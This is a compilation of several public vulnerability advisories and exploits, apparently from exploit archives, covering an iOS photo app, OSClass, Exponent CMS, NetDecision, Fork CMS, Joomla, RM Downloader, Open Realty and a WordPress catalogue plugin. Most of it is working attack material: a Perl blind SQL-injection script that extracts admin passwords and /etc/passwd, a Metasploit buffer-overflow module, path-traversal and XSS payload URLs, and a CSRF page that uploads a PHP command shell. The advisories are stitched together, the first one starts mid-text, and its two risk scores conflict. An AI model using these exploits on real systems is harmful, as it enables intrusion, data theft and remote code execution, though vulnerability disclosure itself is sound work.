Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname.
Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync.
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
of the local file include web vulnerability results in mobile application or connected device component compromise.
Vulnerable Method(s):
[+] [Sync]
Vulnerable Module(s):
[+] Albumname
Vulnerable Parameter(s):
[+] name
Affected Module(s):
[+] File Dir Index
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost:8080/
<script type="text/javascript">
var albumArray = getAllAlbum();
var numberOfAlbums = getNumberOfAlbums();
for (var i=0; i<numberOfAlbums; i=i+4)
{
document.write("<tr>");
document.write("<td height=\"170\" width=\"150\">");
if (i+0 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+1 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+2 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
}
document.write("</td>");
document.write("<td height=\"170\" width=\"50\"></td>");
document.write("<td height=\"170\" width=\"150\">");
if (i+3 < numberOfAlbums)
{
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+0 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+1 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+2 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("<td height=\"20\" width=\"50\"></td>");
document.write("<td height=\"20\" > <p align=\"center\">");
if (i+3 < numberOfAlbums)
{
document.write("<font face=\"Courier New\" size=\"2\">");
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
document.write("</font>");
}
document.write("</td>");
document.write("</tr>");
document.write("<tr>");
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
document.write("</tr>");
}
</script>
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
</table>
</div>
</body>
</html></iframe></font></p></td></tr></tbody>
Reference(s):
http://localhost:8080/
Security Risk:
==============
The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
source: https://www.securityfocus.com/bid/52336/info
OSClass is prone to a directory-traversal vulnerability and an arbitrary-file-upload vulnerability.
An attacker can exploit these issues to obtain sensitive information and to upload arbitrary code and run it in the context of the webserver process.
OSClass 2.3.5 is vulnerable; prior versions may also be affected.
Arbitrary File Upload Vulnerability:
1. Take a php file and rename it .gif (not really needed since OSClass trusts mime type)
2. Upload that file as picture for a new item and get its name (is 5_small.jpg)
3. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding in combine.php)
4. Use combine.php to move itself to oc-content/uploads
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../uploads/combine.php&files=combine.php
now we have a copy of combine.php placed into uploads dir (the same dir where our malicius php file has been uploaded)
5. Use uploads/combine.php to move 5_original.php to /remote.php
http://www.example.com/osclass/oc-content/uploads/combine.php?files=5_original.jpg&type=/../../remote.php
6. Run the uploaded php file
http://www.example.com/osclass/remote.php
Directory Traversal Vulnerability:
It is possible to download and arbitrary file (ie config.php) under the www root.
1. Change useragent of your browser to: "Mozilla/4.0 (compatible; MSIE 5.0" . (needed to disable gzip encoding)
2. Move combine.php into web root
http://www.example.com/osclass/oc-content/themes/modern/combine.php?type=./../../../combine.php&files=combine.php
3. Run combine to download config.php
http://www.example.com/osclass/combine.php?files=config.php
source: https://www.securityfocus.com/bid/52328/info
Exponent CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exponent CMS 2.0.4 is vulnerable; prior versions may also be affected.
http://www.example.com//exponent/cron/send_reminders.php?src=src%3d11"%3b}'%20or%201%3d1%20AND%20SLEEP(5)%20%3b%20--%20"
source: https://www.securityfocus.com/bid/52327/info
NetDecision is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Exploiting the issues can allow an attacker to obtain sensitive information that could aid in further attacks.
NetDecision 4.6.1 is vulnerable; other versions may also be affected.
http://www.example.com:8087/...\...\...\...\...\...\windows\system.ini
http://www.example.com:8090/.../.../.../.../.../.../windows/system.ini
source: https://www.securityfocus.com/bid/52319/info
Fork CMS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.
Fork CMS 3.2.7 and 3.2.6 are vulnerable; other versions may also be affected.
http://www.example.com/private/en/locale/edit?id=37&value="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&name="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&type[]="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&module="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&application="><script>alert("ZSL");</script>
http://www.example.com/private/en/locale/edit?id=37&language[]="><script>alert("ZSL");</script>
Parameter: form_token
Method: POST
- POST /private/en/authentication/?querystring=/private/en HTTP/1.1
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=t275j7es7rj2078a25o4m27lt0; interface_language=s%3A2%3A%22en%22%3B; track=s%3A32%3A%22b8cab7d50fd32c5dd3506d0c88edb795%22%3B
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
backend_email=&backend_password=&form=authenticationIndex&form_token="><script>alert("ZSL");</script>&login=Log%20in
Parameters: position_1, position_2, position_3, position_4
Method: POST
- POST http://localhost/private/en/extensions/edit_theme_template?token=true&id=4 HTTP/1.1
form=edit&form_token=d75161cf347e7b12f53df4cf4082f27a&theme=triton&file=home.tpl&label=Home&position_0=&type_0_0=0&position_1="><script>alert("ZSL");</script>&position_2=left&position_3=right&position_4=top&type_4_0=1&position_5=advertisement&format=%5B%2F%2Cadvertisement%2Cadvertisement%2Cadvertisement%5D%2C%0D%0A%5B%2F%2C%2F%2Ctop%2Ctop%5D%2C%0D%0A%5B%2F%2C%2F%2C%2F%2C%2F%5D%2C%0D%0A%5Bmain%2Cmain%2Cmain%2Cmain%5D%2C%0D%0A%5Bleft%2Cleft%2Cright%2Cright%5D
Parameter: success_message
Method: POST
- POST http://localhost/private/en/form_builder/edit?token=true&id=1 HTTP/1.1
form=edit&form_token=&id=1&name=Contact&method=database_email&inputField-email%5B%5D=jox@jox.com&addValue-email=&email=jox@jox.com&success_message="><script>alert("ZSL");</script>&identifier=contact-en
Parameter: smtp_password
Method: POST
- POST http://localhost/private/en/settings/email HTTP/1.1
form=settingsEmail&form_token=&mailer_type=mail&mailer_from_name=Fork+CMS&mailer_from_email=jox@jox.com&mailer_to_name=Fork+CMS&mailer_to_email=jox@jox.com&mailer_reply_to_name=Fork+CMS&mailer_reply_to_email=jox@jox.com&smtp_server=&smtp_port=&smtp_username=&smtp_password="><script>alert("ZSL");</script>
Parameters: site_html_footer, site_html_header
Method: POST
- POST http://localhost/private/en/settings/index HTTP/1.1
form=settingsIndex&form_token=&site_title=My+website&site_html_header=&site_html_footer="><script>alert("ZSL");</script>&time_format=H%3Ai&date_format_short=j.n.Y&date_format_long=l+j+F+Y&number_format=dot_nothing&fork_api_public_key=f697aac745257271d83bea80f965e3c1&fork_api_private_key=6111a761ec566d325a623e0dcaf614e2&akismet_key=&ckfinder_license_name=Fork+CMS&ckfinder_license_key=QJH2-32UV-6VRM-V6Y7-A91J-W26Z-3F8R&ckfinder_image_max_width=1600&ckfinder_image_max_height=1200&addValue-facebookAdminIds=&facebook_admin_ids=&facebook_application_id=&facebook_application_secret=
source: https://www.securityfocus.com/bid/52312/info
Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
# www.securitybydefault.com
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
#
# using sleep() and not benchmark(), change for < mysql 5.0.12
#
# 1.- Database name: database()
# 2.- Users data table name: (change 'joomla' for database() result)
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
# 3.- Admin password: (change zzz_users from previus sql query result)
# select password from zzzz_users limit 1
use strict;
use LWP::UserAgent;
$| = 1;
my $url = $ARGV[0];
my $wtime = $ARGV[1];
my $sql = $ARGV[2];
unless ($ARGV[2]) {
print "$0 <url> <wait time> <sql>\n";
print "\texamples:\n";
print "\t get admin password:\n";
print "\t\t$0 http://host/joomla/ 3 'database()'\n";
print "\t\t$0 http://host/joomla/ 3 'select table_name from information_schema.tables where table_schema=\"joomla\" and table_name like \"%25_users\"\'\n";
print "\t\t$0 http://host/joomla/ 3 'select password from zzzz_users limit 1'\n";
print "\t get file /etc/passwd\n";
print "\t\t$0 http://host/joomla/ 3 'load_file(\"/etc/passwd\")'\n";
exit 1;
}
my ($len,$sqldata);
my $ua = LWP::UserAgent->new;
$ua->timeout(60);
$ua->env_proxy;
my $stime = time();
my $res = $ua->get($url);
my $etime = time();
my $regrtt = $etime - $stime;
print "rtt: $regrtt secs\n";
print "vuln?: ";
my $sleep = $regrtt + $wtime;
$stime = time();
$res = $ua->get($url."/index.php/404' union select sleep($sleep) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) { print "ok!\n"; } else { print "nope :(\n"; exit 1; }
my $lenoflen;
sub len {
# length of length
for (1..5) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(length(length(($sql)))=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$lenoflen = $_;
last;
}
}
for (1..$lenoflen) {
my $ll;
$ll=$_;
for (0..9) {
my $sql=$_[0];
$stime = time();
$res = $ua->get($url."/index.php/404' union select if(mid(length(($sql)),$ll,1)=$_,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$len .= $_;
}
}
}
return $len;
}
sub data {
my $sql = $_[0];
my $len = $_[1];
my ($bit, $str, @byte);
my $high = 128;
for (1..$len) {
my $c=8;
@byte="";
my $a=$_;
for ($bit=1;$bit<=$high;$bit*=2) {
$stime = time();
# select if((ord(mid((load_file("/etc/passwd")),1,1)) & 64)=0,sleep(2),null) union select '1';
$res = $ua->get($url."/index.php/404' union select if((ord(mid(($sql),$a,1)) & $bit)=0,sleep($wtime),null) union select '1");
$etime = time();
my $rtt = $etime - $stime;
if ($rtt >= $regrtt + $wtime) {
$byte[$c]="0";
} else { $byte[$c]="1"; }
$c--;
}
$str = join("",@byte);
print pack("B*","$str");
}
}
$len = len($sql);
print "$sql length: $len\n";
print "$sql data:\n\n";
data($sql,$len);
source: https://www.securityfocus.com/bid/52306/info
11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
11in1 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/11in1/admin/tps?id=1'[SQL Injection Vulnerability!]
source: https://www.securityfocus.com/bid/52306/info
11in1 CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
11in1 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/11in1/admin/comments?topicID=1'[SQL Injection Vulnerability!]
###
#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: RM Downloader v2.7.5.400 Local Buffer Overflow (MSF)
#[+] Date: 25-03-2015
#[+] Type: Local Exploits
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe
#[+] Twitter: @TCYB3R
##
##
# $Id: rmdownloader_bof.rb 2015-04-01 03:03 TUNISIAN CYBER $
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit',
'Description' => %q{
This module exploits a stack buffer overflow in RM Downloader v2.7.5.400
creating a specially crafted .ram file, an attacker may be able
to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
[
'TUNISIAN CYBER', # Original
'TUNISIAN CYBER' # MSF Module
],
'Version' => 'Version 2.7.5.400',
'References' =>
[
[ 'URL', 'https://www.exploit-db.com/exploits/36502/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP-SP3 (EN)', { 'Ret' => 0x7C9D30D7} ]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ false, 'The file name.', 'msf.ram']),
], self.class)
end
def exploit
sploit = rand_text_alphanumeric(35032) # Buffer Junk
sploit << [target.ret].pack('V')
sploit << make_nops(4)
sploit << payload.encoded
tc = sploit
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(tc)
end
end
source: https://www.securityfocus.com/bid/52296/info
Open Realty is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
Open Realty version 2.5.8 is vulnerable; other versions may also be affected.
http://www.example.com/open-realty2.5.8/?select_users_template=../../../../../../../../../../../../../../../etc/passwd%00
# Exploit Title: Multiple Persistent XSS & CSRF & File Upload on Ultimate
Product Catalogue 3.1.2
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
intext:"Category",
inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link:
https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: <= 3.1.2, Comunicated and Fixed by the Vendor in 3.1.5
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
2.4.0 (Ubuntu)
# CVE : N/A
# Category: webapps
1. Summary:
Ultimate Product Catalogue is a responsive and easily customizable plugin
for all your product catalogue needs. It has +63.000 downloads, +4.000
active installations.
Product Name and Description and File Upload formulary of plugin Ultimate
Product Catalog lacks of proper CSRF protection and proper filtering.
Allowing an attacker to alter a product pressented to a customer or the
wordpress administrators and insert XSS in his product name and
description. It also allows an attacker to upload a php script though a
CSRF due to a lack of file type filtering when uploading it.
2. Vulnerability timeline:
- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Comunicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com
and fixed two SQLi in 3.1.3 but not these vulnerabilities.
- 28/04/2015: Fixed version in 3.1.5 without notifying me.
3. Vulnerable code:
In file html/ProductPage multiple lines.
3. Proof of concept:
https://www.youtube.com/watch?v=roB_ken6U4o
----------------------------------------------------------------------------------------------
------------- CSRF & XSS in Product Description and Name -----------
----------------------------------------------------------------------------------------------
<iframe width=0 height=0 style="display:none" name="csrf-frame"></iframe>
<form method='POST'
action='http://
<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'
target="csrf-frame"
id="csrf-form">
<input type='hidden' name='action' value='Edit_Product'>
<input type='hidden' name='_wp_http_referer'
value='/wp-admin/admin.php?page=UPCP-options&Action=UPCP_EditProduct&Update_Item=Product&Item_ID=16'/>
<input type='hidden' name='Item_Name' value="Product
name</a><script>alert('Product Name says: '+document.cookie)</script><a>"/>
<input type='hidden' name='Item_Slug' value='asdf'/>
<input type='hidden' name='Item_ID' value='16'/>
<input type='hidden' name='Item_Image' value='
http://i.imgur.com/6cWKujq.gif'>
<input type='hidden' name='Item_Price' value='666'>
<input type='hidden' name='Item_Description' value="Product
description says<script>alert('Product description says:
'+document.cookie)</script>"/>
<input type='hidden' name='Item_SEO_Description' value='seo desc'>
<input type='hidden' name='Item_Link' value=''>
<input type='hidden' name='Item_Display_Status' value='Show'>
<input type='hidden' name='Category_ID' value=''>
<input type='hidden' name='SubCategory_ID' value=''>
<input style="display:none" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
----------------------------------------------------------------------------------------------
-------- CSRF & File Upload in Product Description and Name ------
----------------------------------------------------------------------------------------------
<html>
<body onload="submitRequest();">
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http://<web>/wp-admin/admin.php?page=UPCP-options&Action=UPCP_AddProductSpreadsheet&DisplayPage=Product",
true);
xhr.setRequestHeader("Host", "<web>");
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Cache-Control", "max-age=0");
xhr.setRequestHeader("Accept-Language",
"en-US,en;q=0.8,es;q=0.6");
xhr.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT
6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.37
Safari/537.36");
xhr.setRequestHeader("Accept-Encoding", "gzip, deflate");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=----WebKitFormBoundarylPTZvbxAcw0q01W3");
var body = "------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
"Content-Disposition: form-data;
name=\"Products_Spreadsheet\"; filename=\"cooldog.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<?php\r\n" +
"exec($_GET['c'],$output);\r\n" +
"foreach ($output as $line) {\r\n" +
"echo \"<br/>\".$line;\r\n" +
"}\r\n" +
"?>\r\n" +
"------WebKitFormBoundarylPTZvbxAcw0q01W3\r\n" +
"Content-Disposition: form-data; name='submit'\r\n" +
"\r\n" +
"Add New Products\r\n" +
"------WebKitFormBoundarylPTZvbxAcw0q01W3--\r\n" ;
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input style="display:none;" type="submit" value="Up!"
onclick="submitRequest();" />
</form>
</body>
</html>
Te file cooldog.php is no available in path http://
<web>/wp-content/plugins/ultimate-product-catalogue/product-sheets/cooldog.php
4. Solution:
Update to version 3.1.5